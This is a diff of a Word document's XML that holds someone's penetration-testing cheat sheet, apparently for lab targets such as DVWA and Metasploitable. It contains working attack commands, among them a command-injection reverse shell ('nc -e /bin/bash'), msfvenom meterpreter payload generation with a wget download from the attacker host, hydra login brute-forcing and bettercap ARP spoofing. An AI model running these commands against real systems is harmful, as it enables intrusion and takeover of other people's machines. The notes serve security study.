+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>filepath</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -3279,7 +4311,23 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>CL: ssh msfadmin@{IPADDRESS}</w:t>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ssh</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>msfadmin</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>@{IPADDRESS}</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3304,8 +4352,21 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>CL: set payload windows/meterpreter/reverse_tcp</w:t>
-            </w:r>
+              <w:t>CL: set payload windows/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>meterpreter</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>reverse_tcp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -3378,8 +4439,13 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>CL: search eternalblue</w:t>
-            </w:r>
+              <w:t xml:space="preserve">CL: search </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>eternalblue</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p/>
         </w:tc>
@@ -3400,12 +4466,14 @@
             <w:pPr>
               <w:jc w:val="center"/>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
               <w:t>DoublePulsar</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="yellow"/>
@@ -3426,13 +4494,36 @@
             </w:r>
           </w:p>
           <w:p>
-            <w:r>
-              <w:t>Sudo su</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>Sudo dpkg –add-architecture i386 &amp;&amp; apt-get update &amp;&amp; apt-get install wine32</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>su</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+          <w:p>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>dpkg</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> –add-architecture i386 &amp;&amp; apt-get update &amp;&amp; apt-get install wine32</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -3457,11 +4548,19 @@
                 <w:highlight w:val="yellow"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t>BlueKeep -RDP Vulnerability</w:t>
+              <w:t>BlueKeep</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -RDP Vulnerability</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3490,12 +4589,14 @@
             <w:pPr>
               <w:jc w:val="center"/>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
               <w:t>Routersploit</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -3526,8 +4627,13 @@
               </w:numPr>
             </w:pPr>
             <w:r>
-              <w:t>Follow the instructions in github</w:t>
-            </w:r>
+              <w:t xml:space="preserve">Follow the instructions in </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>github</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -3654,8 +4760,21 @@
                 <w:szCs w:val="20"/>
                 <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
               </w:rPr>
-              <w:t>cd routersploit</w:t>
-            </w:r>
+              <w:t xml:space="preserve">cd </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+              </w:rPr>
+              <w:t>routersploit</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -3756,8 +4875,13 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>CL: use scanners/autopwn</w:t>
-            </w:r>
+              <w:t>CL: use scanners/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>autopwn</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:r>
@@ -3855,7 +4979,21 @@
               <w:rPr>
                 <w:highlight w:val="green"/>
               </w:rPr>
-              <w:t>Gaining Access(Viruses, Trojan, Payloads)</w:t>
+              <w:t xml:space="preserve">Gaining </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="green"/>
+              </w:rPr>
+              <w:t>Access(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="green"/>
+              </w:rPr>
+              <w:t>Viruses, Trojan, Payloads)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3878,8 +5016,18 @@
                 <w:bCs/>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t>Note: msfvenom</w:t>
-            </w:r>
+              <w:t xml:space="preserve">Note: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>msfvenom</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -3913,7 +5061,15 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>CL: msfvenom -h</w:t>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>msfvenom</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -h</w:t>
             </w:r>
             <w:r>
               <w:t>elp or -h</w:t>
@@ -3921,8 +5077,15 @@
           </w:p>
           <w:p/>
           <w:p>
-            <w:r>
-              <w:t>CL:msfvenom -p</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:t>CL:msfvenom</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -p</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -3934,12 +5097,28 @@
               <w:t>:</w:t>
             </w:r>
             <w:r>
-              <w:t xml:space="preserve"> msfvenom –list venom</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: msfvenom –list payload</w:t>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>msfvenom</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> –list venom</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>msfvenom</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> –list payload</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -3983,7 +5162,25 @@
                 <w:bCs/>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t>Veil – generating powershell payload</w:t>
+              <w:t xml:space="preserve">Veil – generating </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>powershell</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> payload</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4074,7 +5271,15 @@
               <w:jc w:val="center"/>
             </w:pPr>
             <w:r>
-              <w:t>Note: fatrat – check it out in google and follow instructions</w:t>
+              <w:t xml:space="preserve">Note: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>fatrat</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> – check it out in google and follow instructions</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4114,9 +5319,11 @@
             <w:gridSpan w:val="2"/>
           </w:tcPr>
           <w:p>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>getuid</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -4185,21 +5392,36 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>CL meterpreter</w:t>
-            </w:r>
+              <w:t xml:space="preserve">CL </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>meterpreter</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t xml:space="preserve"> &gt; </w:t>
             </w:r>
           </w:p>
           <w:p>
             <w:r>
-              <w:t>CL: pwd</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: dir</w:t>
-            </w:r>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>pwd</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>dir</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:r>
@@ -4235,12 +5457,30 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>Some of the command in, when your in windows 10 machine</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>&gt;download {fileName}</w:t>
+              <w:t xml:space="preserve">Some of the command in, when </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:t>your</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> in windows 10 machine</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;download {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>fileName</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -4248,7 +5488,15 @@
               <w:t>&gt;</w:t>
             </w:r>
             <w:r>
-              <w:t>upload {fileName}</w:t>
+              <w:t>upload {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>fileName</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -4291,7 +5539,15 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>&gt;search bypassuac – user account control</w:t>
+              <w:t xml:space="preserve">&gt;search </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>bypassuac</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> – user account control</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -4431,8 +5687,13 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>&lt;dirb</w:t>
-            </w:r>
+              <w:t>&lt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>dirb</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t xml:space="preserve">     ----</w:t>
             </w:r>
@@ -4440,12 +5701,28 @@
               <w:sym w:font="Wingdings" w:char="F0E0"/>
             </w:r>
             <w:r>
-              <w:t xml:space="preserve"> Find directory in the website</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">&lt;dirb </w:t>
+              <w:t xml:space="preserve"> Find directory </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:t>in</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> the website</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&lt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>dirb</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
             </w:r>
             <w:hyperlink w:history="1">
               <w:r>
@@ -4477,7 +5754,23 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>&gt;dvwa website 192.168.1.1;ls-la</w:t>
+              <w:t>&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>dvwa</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> website </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:t>192.168.1.1;ls</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:t>-la</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -4487,7 +5780,23 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>&gt;nc -lvp 12345</w:t>
+              <w:t>&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nc</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>lvp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> 12345</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -4497,7 +5806,15 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>192.168.1.1; nc -e /bin/bash 192.168.1.85 12345</w:t>
+              <w:t xml:space="preserve">192.168.1.1; </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nc</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -e /bin/bash 192.168.1.85 12345</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -4518,7 +5835,31 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>&gt;msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.9 LPORT=6000 &gt;&gt; tester.py</w:t>
+              <w:t>&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>msfvenom</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -p python/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>meterpreter</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>reverse_tcp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> LHOST=192.168.1.9 LPORT=6000 &gt;&gt; tester.py</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -4527,13 +5868,27 @@
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t>&gt;s</w:t>
-            </w:r>
+              <w:t>&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t>udo service apache2 start</w:t>
+              <w:t>s</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>udo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> service apache2 start</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -4550,39 +5905,72 @@
               </w:rPr>
               <w:t>&gt;</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                 <w:color w:val="111111"/>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t>sudo service apache2 restart</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
+              <w:t>sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                 <w:color w:val="111111"/>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t>&gt;sudo service apache2 stop</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p>
-            <w:r>
+              <w:t xml:space="preserve"> service apache2 restart</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:color w:val="111111"/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
               <w:t>&gt;</w:t>
             </w:r>
-            <w:r>
-              <w:t>192.168.1.1</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:color w:val="111111"/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:color w:val="111111"/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> service apache2 stop</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t>&gt;</w:t>
+            </w:r>
+            <w:r>
+              <w:t>192.168.1.</w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:t>1</w:t>
             </w:r>
             <w:r>
               <w:t>;ls</w:t>
             </w:r>
+            <w:proofErr w:type="gramEnd"/>
           </w:p>
           <w:p>
             <w:r>
@@ -4590,25 +5978,47 @@
             </w:r>
           </w:p>
           <w:p>
+            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:t>&gt;;ls</w:t>
             </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:r>
-              <w:t>&gt;wget 192.168.1.85/tester.py</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>&gt;;wget 192.168.1.9/tester.py</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
+            <w:proofErr w:type="gramEnd"/>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t>&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>wget</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> 192.168.1.85/tester.py</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:t>&gt;;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>wget</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> 192.168.1.9/tester.py</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:t>&gt;;ls</w:t>
             </w:r>
+            <w:proofErr w:type="gramEnd"/>
           </w:p>
           <w:p/>
           <w:p/>
@@ -4676,15 +6086,34 @@
                 <w:highlight w:val="yellow"/>
                 <w:u w:val="single"/>
               </w:rPr>
-              <w:t>– Code injection</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
+              <w:t xml:space="preserve">– Code </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:highlight w:val="yellow"/>
                 <w:u w:val="single"/>
               </w:rPr>
-              <w:t>(usually steal session and cookies)</w:t>
+              <w:t>injection</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:u w:val="single"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:u w:val="single"/>
+              </w:rPr>
+              <w:t>usually steal session and cookies)</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -4812,7 +6241,15 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">Python -m SimpleHTTPServer </w:t>
+              <w:t xml:space="preserve">Python -m </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>SimpleHTTPServer</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
             </w:r>
             <w:r>
               <w:t>{PORT}</w:t>
@@ -4901,7 +6338,15 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>hydra 192.168.1.75 http-form-post "/dvwa/login.php:username=^USER^&amp;password=^PASS^&amp;Login=submit:Login failed" -L usernames.txt -P passwords.txt</w:t>
+              <w:t>hydra 192.168.1.75 http-form-post "</w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:t>/dvwa/login.php:username</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:t>=^USER^&amp;password=^PASS^&amp;Login=submit:Login failed" -L usernames.txt -P passwords.txt</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4965,7 +6410,21 @@
               <w:rPr>
                 <w:highlight w:val="green"/>
               </w:rPr>
-              <w:t>Man In The Middle Attack</w:t>
+              <w:t xml:space="preserve">Man In </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="green"/>
+              </w:rPr>
+              <w:t>The</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="green"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> Middle Attack</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4990,18 +6449,41 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>NOTE: Need to be ROOT USER</w:t>
+              <w:t xml:space="preserve">NOTE: Need to be ROOT </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:t>USER</w:t>
             </w:r>
             <w:r>
               <w:t>(</w:t>
             </w:r>
+            <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
                 <w:b/>
                 <w:bCs/>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t>You need install bettercap in Kali</w:t>
+              <w:t xml:space="preserve">You need install </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>bettercap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> in Kali</w:t>
             </w:r>
             <w:r>
               <w:t>)</w:t>
@@ -5009,16 +6491,26 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>&gt;apt-get install betterca</w:t>
+              <w:t xml:space="preserve">&gt;apt-get install </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>betterca</w:t>
             </w:r>
             <w:r>
               <w:t>p</w:t>
             </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>&gt;bettercap</w:t>
-            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>bettercap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:r>
@@ -5030,28 +6522,86 @@
               <w:t>&gt;</w:t>
             </w:r>
             <w:r>
-              <w:t>help net.probe</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>&gt;net.probe on</w:t>
+              <w:t xml:space="preserve">help </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:t>net.probe</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:t>net.probe</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> on</w:t>
             </w:r>
           </w:p>
           <w:p>
             <w:r>
               <w:lastRenderedPageBreak/>
-              <w:t>&gt;help arp.spoof</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>&gt;set arp.spoof.fullduplex true</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>&gt;set arp.spoof.targets {ipaddress}</w:t>
+              <w:t xml:space="preserve">&gt;help </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:t>arp.spoof</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">&gt;set </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:t>arp.spoof</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:t>.fullduplex</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
